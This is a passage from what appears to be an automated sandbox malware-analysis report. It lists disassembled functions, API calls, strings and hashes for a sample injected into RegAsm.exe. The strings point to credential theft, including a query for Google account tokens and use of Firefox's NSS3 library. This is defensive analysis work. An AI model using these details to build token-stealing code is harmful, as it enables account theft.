                                                                                  • Part of subcall function 004063B1: _EH_prolog.MSVCRT ref: 004063B6
                                                                                  • Part of subcall function 004063B1: memcmp.MSVCRT ref: 004063DC
                                                                                  • Part of subcall function 004063B1: memset.MSVCRT ref: 0040640B
                                                                                  • Part of subcall function 004063B1: LocalAlloc.KERNEL32(00000040,-000000E1,?,?,?,?,00000000,00000000), ref: 00406440
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.2640792644.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: H_prologlstrcpylstrlen$AllocLocallstrcat$memcmpmemset
                                                                                • String ID: AccountId$GoogleAccounts$GoogleAccounts$SELECT service, encrypted_token FROM token_service
                                                                                • API String ID: 832884763-1713091031
                                                                                • Opcode ID: 0bf1674a6efb8798c61355e451ce1d077afbea3a60b4692c48dbdc0c0b441352
                                                                                • Instruction ID: 823a27315a2be3ebe0b3d1da1d3875886139d2c3e3f614190907fe3239292f81
                                                                                • Opcode Fuzzy Hash: 0bf1674a6efb8798c61355e451ce1d077afbea3a60b4692c48dbdc0c0b441352
                                                                                • Instruction Fuzzy Hash: 77C13A71904248EADB15EBE5D956BDDBBB4AF18308F60407EE406B25C2DF782B0CDB25
                                                                                Function 6C872E50 Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 282COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C872F3D
                                                                                • memset.VCRUNTIME140(?,00000000,?), ref: 6C872FB9
                                                                                • memcpy.VCRUNTIME140(?,00000000,?), ref: 6C873005
                                                                                • memcpy.VCRUNTIME140(?,?,?), ref: 6C8730EE
                                                                                • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C873131
                                                                                • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,0001086C,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C873178
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650569482.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651298310.000000006CA2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651320867.000000006CA2F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651349013.000000006CA30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651375717.000000006CA35000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: memcpy$memsetsqlite3_log
                                                                                • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                • API String ID: 984749767-598938438
                                                                                • Opcode ID: 85b0bac9c101bc0f8e2811a1ab5c38593562b65ca11dff79b430349e0dce106f
                                                                                • Instruction ID: 8e189334c917198ee1e19978da26879a47eafd2742e35bbdbf4e4c38004c15e2
                                                                                • Opcode Fuzzy Hash: 85b0bac9c101bc0f8e2811a1ab5c38593562b65ca11dff79b430349e0dce106f
                                                                                • Instruction Fuzzy Hash: C7B19E70E05219DFCB29CF9DC984AAEBBB1BF49304F144429E845B7B41E7749981CBB1
                                                                                Function 0040E204 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 100stringmemoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.2640792644.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Heaplstrlenstrchr$AllocH_prologProcessstrcpy_s
                                                                                • String ID: 0123456789ABCDEF
                                                                                • API String ID: 1978830238-2554083253
                                                                                • Opcode ID: d06e3702c8d3da9ee1a5dc5dd05ac478fe31f46df90bac3dc58f48b3a5b04af6
                                                                                • Instruction ID: 22cfb6a18308d0bafb54031e8f985605d6d066b02289ec25e5459ee2ebffdd05
                                                                                • Opcode Fuzzy Hash: d06e3702c8d3da9ee1a5dc5dd05ac478fe31f46df90bac3dc58f48b3a5b04af6
                                                                                • Instruction Fuzzy Hash: B431C272A00115AFDB04EFAACC45AAF7BADEF49354B00447EF901EB2D1DA789905C764
                                                                                Function 6C906C40 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 87COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • PR_LogPrint.NSS3(C_DigestInit), ref: 6C906C66
                                                                                • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C906C94
                                                                                • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C906CA3
                                                                                  • Part of subcall function 6C9ED930: PL_strncpyz.NSS3(?,?,?), ref: 6C9ED963
                                                                                • PR_LogPrint.NSS3(?,00000000), ref: 6C906CB9
                                                                                • PR_LogPrint.NSS3( pMechanism = 0x%p,?), ref: 6C906CD5
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650569482.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651298310.000000006CA2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651320867.000000006CA2F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651349013.000000006CA30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651375717.000000006CA35000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: Print$L_strncpyz$L_strcatn
                                                                                • String ID: hSession = 0x%x$ pMechanism = 0x%p$ (CK_INVALID_HANDLE)$C_DigestInit
                                                                                • API String ID: 1003633598-3690128261
                                                                                • Opcode ID: 0e1683bdf195ae2495570aababa1d92e6de16ac6c187a2537a28a1c8c38af388
                                                                                • Instruction ID: 0b52fd76a7c477a34e4391eaa5cd82e8cbe114f98123c3a9c25aacbe05ac81aa
                                                                                • Opcode Fuzzy Hash: 0e1683bdf195ae2495570aababa1d92e6de16ac6c187a2537a28a1c8c38af388
                                                                                • Instruction Fuzzy Hash: 972109317002159BD7149F549D98B5E77B5EFA631CF048029E90DD7B02DB34D88ACBD2
                                                                                Function 6C8D6DB0 Relevance: 15.2, APIs: 10, Instructions: 200memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SECITEM_ArenaDupItem_Util.NSS3(?,6C8D7D8F,6C8D7D8F,?,?), ref: 6C8D6DC8
                                                                                  • Part of subcall function 6C92FDF0: PORT_ArenaAlloc_Util.NSS3(?,0000000C,00000000,?,?), ref: 6C92FE08
                                                                                  • Part of subcall function 6C92FDF0: PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?), ref: 6C92FE1D
                                                                                  • Part of subcall function 6C92FDF0: memcpy.VCRUNTIME140(00000000,?,?,?,?,?,?), ref: 6C92FE62
                                                                                • PORT_ArenaAlloc_Util.NSS3(?,00000010,?,?,6C8D7D8F,?,?), ref: 6C8D6DD5
                                                                                  • Part of subcall function 6C9310C0: TlsGetValue.KERNEL32(?,6C8D8802,00000000,00000008,?,6C8CEF74,00000000), ref: 6C9310F3
                                                                                  • Part of subcall function 6C9310C0: EnterCriticalSection.KERNEL32(?,?,6C8D8802,00000000,00000008,?,6C8CEF74,00000000), ref: 6C93110C
                                                                                  • Part of subcall function 6C9310C0: PL_ArenaAllocate.NSS3(?,?,?,6C8D8802,00000000,00000008,?,6C8CEF74,00000000), ref: 6C931141
                                                                                  • Part of subcall function 6C9310C0: PR_Unlock.NSS3(?,?,?,6C8D8802,00000000,00000008,?,6C8CEF74,00000000), ref: 6C931182
                                                                                  • Part of subcall function 6C9310C0: TlsGetValue.KERNEL32(?,6C8D8802,00000000,00000008,?,6C8CEF74,00000000), ref: 6C93119C
                                                                                • SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6C9F8FA0,00000000,?,?,?,?,6C8D7D8F,?,?), ref: 6C8D6DF7
                                                                                  • Part of subcall function 6C92B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6CA018D0,?), ref: 6C92B095
                                                                                • SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6C8D6E35
                                                                                  • Part of subcall function 6C92FDF0: PORT_Alloc_Util.NSS3(0000000C,00000000,?,?), ref: 6C92FE29
                                                                                  • Part of subcall function 6C92FDF0: PORT_Alloc_Util.NSS3(?,?,?,?), ref: 6C92FE3D
                                                                                  • Part of subcall function 6C92FDF0: free.MOZGLUE(00000000,?,?,?,?), ref: 6C92FE6F
                                                                                • PORT_ArenaAlloc_Util.NSS3(?,0000005C), ref: 6C8D6E4C
                                                                                  • Part of subcall function 6C9310C0: PL_ArenaAllocate.NSS3(?,6C8D8802,00000000,00000008,?,6C8CEF74,00000000), ref: 6C93116E
                                                                                • SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6C9F8FE0,00000000), ref: 6C8D6E82
                                                                                  • Part of subcall function 6C8D6AF0: SECITEM_ArenaDupItem_Util.NSS3(00000000,6C8DB21D,00000000,00000000,6C8DB219,?,6C8D6BFB,00000000,?,00000000,00000000,?,?,?,6C8DB21D), ref: 6C8D6B01
                                                                                  • Part of subcall function 6C8D6AF0: SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,00000000), ref: 6C8D6B8A
                                                                                • SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6C8D6F1E
                                                                                • PORT_ArenaAlloc_Util.NSS3(?,0000005C), ref: 6C8D6F35
                                                                                • SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6C9F8FE0,00000000), ref: 6C8D6F6B
                                                                                • PR_SetError.NSS3(FFFFE005,00000000,6C8D7D8F,?,?), ref: 6C8D6FE1
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650569482.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651298310.000000006CA2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651320867.000000006CA2F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651349013.000000006CA30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651375717.000000006CA35000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: Util$Arena$Item_$Alloc_$DecodeQuick$AllocateErrorValue$CriticalEnterSectionUnlockfreememcpy
                                                                                • String ID:
                                                                                • API String ID: 587344769-0
                                                                                • Opcode ID: 11cdb6497acbc3b291431f12bf0a3c3e8347bfdaad94ec412e0253cb8974ae24
                                                                                • Instruction ID: 4900d29c2cb736335042bfb8d10e20a40cd44387267d16179c1cc222dfe1ed2b
                                                                                • Opcode Fuzzy Hash: 11cdb6497acbc3b291431f12bf0a3c3e8347bfdaad94ec412e0253cb8974ae24
                                                                                • Instruction Fuzzy Hash: 7E71A371D1064A9FEB10CF15CE40BAAB7A4BFA5308F164A25E818D7B11F770F994CB91
                                                                                Function 6C91ADC0 Relevance: 15.1, APIs: 10, Instructions: 148COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • TlsGetValue.KERNEL32(?,6C8FCDBB,?,6C8FD079,00000000,00000001), ref: 6C91AE10
                                                                                • EnterCriticalSection.KERNEL32(?,?,6C8FCDBB,?,6C8FD079,00000000,00000001), ref: 6C91AE24
                                                                                • PR_Unlock.NSS3(?,?,?,?,?,?,6C8FD079,00000000,00000001), ref: 6C91AE5A
                                                                                • memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6C8FCDBB,?,6C8FD079,00000000,00000001), ref: 6C91AE6F
                                                                                • free.MOZGLUE(85145F8B,?,?,?,?,6C8FCDBB,?,6C8FD079,00000000,00000001), ref: 6C91AE7F
                                                                                • TlsGetValue.KERNEL32(?,6C8FCDBB,?,6C8FD079,00000000,00000001), ref: 6C91AEB1
                                                                                • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C8FCDBB,?,6C8FD079,00000000,00000001), ref: 6C91AEC9
                                                                                • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,6C8FCDBB,?,6C8FD079,00000000,00000001), ref: 6C91AEF1
                                                                                • free.MOZGLUE(6C8FCDBB,?,?,?,?,?,?,?,?,?,?,?,?,?,6C8FCDBB,?), ref: 6C91AF0B
                                                                                • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,6C8FCDBB,?,6C8FD079,00000000,00000001), ref: 6C91AF30
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650569482.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651298310.000000006CA2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651320867.000000006CA2F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651349013.000000006CA30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651375717.000000006CA35000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: Unlock$CriticalEnterSectionValuefree$memset
                                                                                • String ID:
                                                                                • API String ID: 161582014-0
                                                                                • Opcode ID: 1812e9d933921d7797595361a6e9b5dc8ecf4a18e4a4819e8e28d43f4ddd0aa0
                                                                                • Instruction ID: 85354b4eee13b897edd6b40cd1f949cd0e95baa125cc43ebee463f7b6d2eb43e
                                                                                • Opcode Fuzzy Hash: 1812e9d933921d7797595361a6e9b5dc8ecf4a18e4a4819e8e28d43f4ddd0aa0
                                                                                • Instruction Fuzzy Hash: 0351D1B1A0460AAFDB05DF25D886B65B7B8FF05318F044264D80897F01EB35EC68CBD1
                                                                                Function 6C8F4CA0 Relevance: 15.1, APIs: 10, Instructions: 142COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • TlsGetValue.KERNEL32(?,00000000,00000000,?,6C8FAB7F,?,00000000,?), ref: 6C8F4CB4
                                                                                • EnterCriticalSection.KERNEL32(0000001C,?,6C8FAB7F,?,00000000,?), ref: 6C8F4CC8
                                                                                • TlsGetValue.KERNEL32(?,6C8FAB7F,?,00000000,?), ref: 6C8F4CE0
                                                                                • EnterCriticalSection.KERNEL32(?,?,6C8FAB7F,?,00000000,?), ref: 6C8F4CF4
                                                                                • PL_HashTableLookup.NSS3(?,?,?,6C8FAB7F,?,00000000,?), ref: 6C8F4D03
                                                                                • PR_Unlock.NSS3(?,00000000,?), ref: 6C8F4D10
                                                                                  • Part of subcall function 6C97DD70: TlsGetValue.KERNEL32 ref: 6C97DD8C
                                                                                  • Part of subcall function 6C97DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C97DDB4
                                                                                • PR_Now.NSS3(?,00000000,?), ref: 6C8F4D26
                                                                                  • Part of subcall function 6C999DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6C9E0A27), ref: 6C999DC6
                                                                                  • Part of subcall function 6C999DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6C9E0A27), ref: 6C999DD1
                                                                                  • Part of subcall function 6C999DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C999DED
                                                                                • PR_Unlock.NSS3(?,?,00000000,?), ref: 6C8F4D98
                                                                                • PR_Unlock.NSS3(?,?,?,00000000,?), ref: 6C8F4DDA
                                                                                • PR_Unlock.NSS3(?,?,?,?,00000000,?), ref: 6C8F4E02
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650569482.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651298310.000000006CA2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651320867.000000006CA2F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651349013.000000006CA30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651375717.000000006CA35000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: Unlock$CriticalSectionTimeValue$EnterSystem$FileHashLeaveLookupTableUnothrow_t@std@@@__ehfuncinfo$??2@
                                                                                • String ID:
                                                                                • API String ID: 4032354334-0
                                                                                • Opcode ID: d03f4c27305764faf339c34fb8043c76e0caca829f75f53e4e58896bd3ca2bef
                                                                                • Instruction ID: 5e037ccc5f274ba629dbb7837187e0283639d4d35ea1e578c86ed74438d688c3
                                                                                • Opcode Fuzzy Hash: d03f4c27305764faf339c34fb8043c76e0caca829f75f53e4e58896bd3ca2bef
                                                                                • Instruction Fuzzy Hash: AB41F9B5A002059BEB206F28EF409A677B8EF9A25DF054971EC18C7B12FB31D915C7E1
                                                                                Function 6C8D2E00 Relevance: 15.1, APIs: 10, Instructions: 78COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SECITEM_DupItem_Util.NSS3(-0000003C,00000000,00000000,?,?,?,6C8D2CDA,?,00000000), ref: 6C8D2E1E
                                                                                  • Part of subcall function 6C92FD80: PORT_Alloc_Util.NSS3(0000000C,?,?,00000001,?,6C8D9003,?), ref: 6C92FD91
                                                                                  • Part of subcall function 6C92FD80: PORT_Alloc_Util.NSS3(A4686C93,?), ref: 6C92FDA2
                                                                                  • Part of subcall function 6C92FD80: memcpy.VCRUNTIME140(00000000,12D068C3,A4686C93,?,?), ref: 6C92FDC4
                                                                                • SECITEM_DupItem_Util.NSS3(?), ref: 6C8D2E33
                                                                                  • Part of subcall function 6C92FD80: free.MOZGLUE(00000000,?,?), ref: 6C92FDD1
                                                                                • TlsGetValue.KERNEL32 ref: 6C8D2E4E
                                                                                • EnterCriticalSection.KERNEL32(?), ref: 6C8D2E5E
                                                                                • PL_HashTableLookup.NSS3(?), ref: 6C8D2E71
                                                                                • PL_HashTableRemove.NSS3(?), ref: 6C8D2E84
                                                                                • PL_HashTableAdd.NSS3(?,00000000), ref: 6C8D2E96
                                                                                • PR_Unlock.NSS3 ref: 6C8D2EA9
                                                                                • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C8D2EB6
                                                                                • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C8D2EC5
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650569482.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651298310.000000006CA2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651320867.000000006CA2F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651349013.000000006CA30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651375717.000000006CA35000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: Util$HashItem_Table$Alloc_$CriticalEnterErrorLookupRemoveSectionUnlockValueZfreefreememcpy
                                                                                • String ID:
                                                                                • API String ID: 3332421221-0
                                                                                • Opcode ID: 20b5f8396f51f1ef8bf0f4ba5998784b6f83f6acbc3ba4ada33b989b8559e0cb
                                                                                • Instruction ID: ea9a1a63cc27e4b1fedb8382391619655fdb548fd16d45622b3554ec6da0dabc
                                                                                • Opcode Fuzzy Hash: 20b5f8396f51f1ef8bf0f4ba5998784b6f83f6acbc3ba4ada33b989b8559e0cb
                                                                                • Instruction Fuzzy Hash: B9213D72A0020267EF245B28ED09A9A3A74DB6231DF054531ED1CC2713F73AD969D7E1
                                                                                Function 6C85CEC0 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 199COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00010A7E,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,00000000,?,00000000,?,?,6C85B999), ref: 6C85CFF3
                                                                                • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000109DA,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,00000000,?,00000000,?,?,6C85B999), ref: 6C85D02B
                                                                                • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00010A70,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?,00000000,?,?,6C85B999), ref: 6C85D041
                                                                                • _byteswap_ushort.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,6C85B999), ref: 6C9A972B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650569482.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651298310.000000006CA2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651320867.000000006CA2F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651349013.000000006CA30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651375717.000000006CA35000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: sqlite3_log$_byteswap_ushort
                                                                                • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                • API String ID: 491875419-598938438
                                                                                • Opcode ID: b06d00ef4b2123e2c6c90ae697823b87e33bf41bc39a2467904d0f8b3707b058
                                                                                • Instruction ID: 0eb632256edfdfa5e2418bb3b91f2d207572d09bd695674007329adc0f7b45f7
                                                                                • Opcode Fuzzy Hash: b06d00ef4b2123e2c6c90ae697823b87e33bf41bc39a2467904d0f8b3707b058
                                                                                • Instruction Fuzzy Hash: 26613671A042108FD3208F29C940BA6BBF5FF55318F58856DE4499BB82E3B7D847C7A1
                                                                                Function 004103A0 Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 46memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CreateDCA.GDI32(00000000,00000000,00000000,00000001), ref: 004103B5
                                                                                • GetDeviceCaps.GDI32(00000000,00000008), ref: 004103C0
                                                                                • GetDeviceCaps.GDI32(00000000,0000000A), ref: 004103CB
                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 004103D6
                                                                                • GetProcessHeap.KERNEL32(00000000,00000104,?,00000000,?,?,00414CC0,?,00000000,?,Display Resolution: ,00000000,?,00426678,00000000,?), ref: 004103E2
                                                                                • HeapAlloc.KERNEL32(00000000,?,00000000,?,?,00414CC0,?,00000000,?,Display Resolution: ,00000000,?,00426678,00000000,?,00000000), ref: 004103E9
                                                                                • wsprintfA.USER32 ref: 004103FB
                                                                                  • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.2640792644.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
